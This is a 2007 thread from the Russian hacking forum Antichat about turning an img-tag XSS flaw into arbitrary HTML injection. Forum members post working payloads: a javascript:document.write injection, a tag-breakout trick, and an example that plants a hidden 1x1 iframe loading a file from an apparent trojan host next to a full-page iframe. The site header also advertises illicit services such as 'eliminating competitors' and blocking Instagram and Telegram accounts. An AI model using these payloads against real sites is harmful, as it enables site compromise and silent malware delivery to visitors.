FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
Iframe через XSS ...
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
Iframe через XSS ...
#
1
20.09.2007, 16:49
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
Iframe через XSS ...
Возможно ли при наличии ХSS вида:
Код:
<IMG SRC="javascript
:alert('XSS');">
выполнить html код, например <iframe>?
P.S Разрешенные теги только <img> =\
...
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
+StArT+
Посмотреть профиль
Репутация
Отправить личное сообщение для +StArT+
Посетить домашнюю страницу +StArT+
Найти все сообщения от +StArT+
Добавить в друзья
#
2
20.09.2007, 16:56
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
Возможно:
Код:
<IMG SRC="javascript
:document.write('[html код]');">
ЗЫ все гениальное просто :)
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 20.09.2007 в
16:58
..
Dr.Z3r0
Посмотреть профиль
Репутация
Отправить личное сообщение для Dr.Z3r0
Найти все сообщения от Dr.Z3r0
Добавить в друзья
#
3
20.09.2007, 17:52
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
Спасибо оч помог, но вот еще есть одна проблема,
при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?
+StArT+
Посмотреть профиль
Репутация
Отправить личное сообщение для +StArT+
Посетить домашнюю страницу +StArT+
Найти все сообщения от +StArT+
Добавить в друзья
#
4
20.09.2007, 23:24
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого
Ponchik
Посмотреть профиль
Репутация
Отправить личное сообщение для Ponchik
Найти все сообщения от Ponchik
Добавить в друзья
#
5
20.09.2007, 23:46
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами:
10495046
Репутация:
2642
А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить
Например
javascript
:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>');
И вообще, если ничего не фильтруется, попробуй обойти тег, то есть:
<IMG SRC="
"><iframe.........>
">
Почитай статьи о XSS и всё поймёшь %)
NOmeR1
Посмотреть профиль
Репутация
Найти все сообщения от NOmeR1
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Xss для новичков
Micr0b
Уязвимости
79
06.07.2018
22:05
Xss
bx_N
Forum for discussion of ANTICHAT
7
11.03.2007
19:17
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.